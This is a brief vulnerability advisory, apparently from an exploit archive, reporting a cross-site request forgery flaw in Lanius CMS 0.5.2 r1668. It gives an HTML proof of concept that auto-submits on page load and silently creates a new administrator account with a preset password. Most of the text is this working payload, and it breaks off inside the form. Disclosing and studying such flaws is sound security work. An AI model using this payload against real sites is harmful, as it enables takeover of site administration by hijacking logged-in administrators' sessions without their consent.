Software Vulnerability Tested On Date
Lanius CMS 0.5.2 r1668 Cross-site Request Forgery Windows Vista + XAMPP 7/5/2010
A cross-site request forgery vulnerability in Lanius CMS 0.5.2 r1668 can be exploited to create a new admin.
Proof of Concept
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/laniuscms/admin.php?com_option=user">
            <input type="hidden" name="task" value="create" />
            <input type="hidden" name="user_id" value="" />
            <input type="hidden" name="user_name" value="a" />
            <input type="hidden" name="user_user" value="new_admin" />
            <input type="hidden" name="user_email" value="" />
            <input type="hidden" name="user_lang" value="" />
            <input type="hidden" name="user_tz" value="" />
            <input type="hidden" name="user_gid" value="5" />
            <input type="hidden" name="user_password" value="Password1" />
            <input type="hidden" name="user_password1" value="Password1" />